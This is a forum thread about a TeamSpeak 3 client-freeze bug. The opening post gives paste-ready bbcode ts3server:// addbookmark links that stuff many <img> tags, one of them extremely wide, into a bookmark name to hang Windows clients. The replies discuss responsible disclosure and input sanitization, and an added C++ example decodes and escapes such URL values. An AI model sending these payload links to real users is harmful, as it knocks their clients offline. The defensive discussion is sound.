TeamSpeak 3 addbookmark client freeze

Asphyxia

Owner
Administrator
Apr 25, 2015
Code:
[url=ts3server://localhost?addbookmark=<img%20source=//a/a><img%20source=//b/b><img%20source=//c/c><img%20source=//d/d><img%20source=//e/e><img%20source=//f/f><img%20source=//z/z><img%20source=//w/w><img%20source=//zz/zz><img%20source=//ad/ad><img%20source=//ffa/ffa><img%20source=//a3/33a><img%20source=//aa43/fa33a><img%20source=//awfea/2343aa><img%20source=//awfe22a/232243aa><img%20source=//awf90ea/234903aa><img%20source=//awz4fea/23443fgaa><img%20source=//ab54wfea/2343z45aa><img%20source=//azas46wfea/234365aaa><img%20source=//awff35ea/2343aawa23a><img%20source=//awfa344ea/245343aa>&nickname=UserNickname]https://www.youtube.com/watch?v=ZbZSe6N_BXs[/url]

This could possibly cause Windows clients to freeze up (thinking it's related to network shares).

Also, apparently if you get a wide enough image that'll do rather well:
Code:
[url=ts3server://localhost?addbookmark=<img%20width=2000000%20source=//a/a>&nickname=UserNickname]https://www.youtube.com/watch?v=ZbZSe6N_BXs[/url]

...

Lastly, I found that editing the SQLite DB to contain a server nickname with a bunch of messed-up <img> sourcing (src=), top-like, will cause freezing on connecting to a server. This does require user interaction, of course, but it is a good example of how TeamSpeak still has some work to do to make their software safer and more free from bugs.

Even more, channel and server names permit newline characters to be entered, which distorts the list showing the server/channel name(s).
 

BennetGallein

New Member
Jun 9, 2019
Has this been reported to TeamSpeak already? It is against ethical standards to just publish such an important vulnerability without giving the company time to respond.
 

Asphyxia

Owner
Administrator
Apr 25, 2015
Another QT bug. Teamspeak needs to just drop QT.
That's partially true; it is the Qt developers' job to handle inputs responsibly. For example, where Qt renders HTML, maybe strip all HTML characters, e.g. "<" and ">", along with their URL-encoded equivalents, just for good measure.

Validate, sanitize, and just make all input and output clean. When developers overlook the in and out they get lions mixed up with sheep.
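As an added example (not code from this thread, from TeamSpeak, or from Qt), here is a small C++ parser that takes the ts3server:// URL posted above, percent-decodes its query values, and then applies the kind of check suggested in the reply: it flags markup only after decoding (so "%3Cimg%3E" is caught as well as "<img>"), escapes HTML metacharacters instead of stripping them, and rejects values containing newline or other control characters, which covers the channel/server-name issue from the first post. The parameter names addbookmark and nickname and the wide-image URL come from the page; the function names, the 64-character cap, and the choice to escape rather than strip are assumptions of this example.

```cpp
// Added example (not TeamSpeak's or Qt's code): decode a ts3server:// URL's
// query and check the values before they reach a rich-text widget.
#include <cctype>
#include <cstddef>
#include <map>
#include <string>

// The "wide image" payload posted above, with the bbcode wrapper removed.
const std::string kWideImageUrl =
    "ts3server://localhost?addbookmark=<img%20width=2000000%20source=//a/a>"
    "&nickname=UserNickname";

// Decode %XX escapes ("%20" -> " ", "%3C" -> "<"); malformed escapes stay literal.
std::string percentDecode(const std::string& in) {
    std::string out;
    for (std::size_t i = 0; i < in.size(); ++i) {
        if (in[i] == '%' && i + 2 < in.size() &&
            std::isxdigit(static_cast<unsigned char>(in[i + 1])) &&
            std::isxdigit(static_cast<unsigned char>(in[i + 2]))) {
            out += static_cast<char>(std::stoi(in.substr(i + 1, 2), nullptr, 16));
            i += 2;
        } else {
            out += in[i];
        }
    }
    return out;
}

// Split "scheme://host?k1=v1&k2=v2" into decoded key/value pairs.
std::map<std::string, std::string> parseQuery(const std::string& url) {
    std::map<std::string, std::string> params;
    const std::size_t q = url.find('?');
    if (q == std::string::npos) return params;
    const std::string query = url.substr(q + 1);
    std::size_t start = 0;
    while (start <= query.size()) {
        std::size_t amp = query.find('&', start);
        if (amp == std::string::npos) amp = query.size();
        const std::string pair = query.substr(start, amp - start);
        const std::size_t eq = pair.find('=');
        if (eq == std::string::npos) {
            if (!pair.empty()) params[percentDecode(pair)] = "";
        } else {
            params[percentDecode(pair.substr(0, eq))] = percentDecode(pair.substr(eq + 1));
        }
        start = amp + 1;
    }
    return params;
}

// One decoded parameter, or "" when it is absent (hypothetical helper name).
std::string queryParam(const std::string& url, const std::string& key) {
    const std::map<std::string, std::string> params = parseQuery(url);
    const auto it = params.find(key);
    return it == params.end() ? std::string() : it->second;
}

// True when a *decoded* value contains characters a rich-text renderer would
// treat as markup. Run it after percentDecode, or "%3Cimg%3E" slips through.
bool containsMarkup(const std::string& s) {
    return s.find('<') != std::string::npos || s.find('>') != std::string::npos;
}

// Escape HTML metacharacters so the value is displayed as literal text.
std::string escapeHtml(const std::string& s) {
    std::string out;
    for (char c : s) {
        switch (c) {
            case '&':  out += "&amp;";  break;
            case '<':  out += "&lt;";   break;
            case '>':  out += "&gt;";   break;
            case '"':  out += "&quot;"; break;
            case '\'': out += "&#39;";  break;
            default:   out += c;
        }
    }
    return out;
}

struct NameCheck {
    bool ok;              // false: reject the name (and the URL carrying it)
    std::string reason;   // why it was rejected; empty when ok
    std::string display;  // escaped text that is safe to hand to a rich-text widget
};

// Policy for a bookmark/server/channel name or nickname. The 64-character cap
// is an assumption of this example, not a TeamSpeak limit.
NameCheck checkDisplayName(const std::string& raw, std::size_t maxLen = 64) {
    for (unsigned char c : raw) {
        // Rejects the newline trick that distorts the server/channel list.
        if (c < 0x20 || c == 0x7f) return {false, "control character", ""};
    }
    if (raw.size() > maxLen) return {false, "too long", ""};
    return {true, "", escapeHtml(raw)};
}
```

Escaping rather than stripping keeps a legitimately chosen name such as "Tom & Jerry's" intact while still making "<img ...>" render as plain text; stripping "<" and ">" works too but silently alters names. The important ordering point is that every check runs on the decoded value: checked before decoding, the raw URL would pass while the client later decodes it into markup.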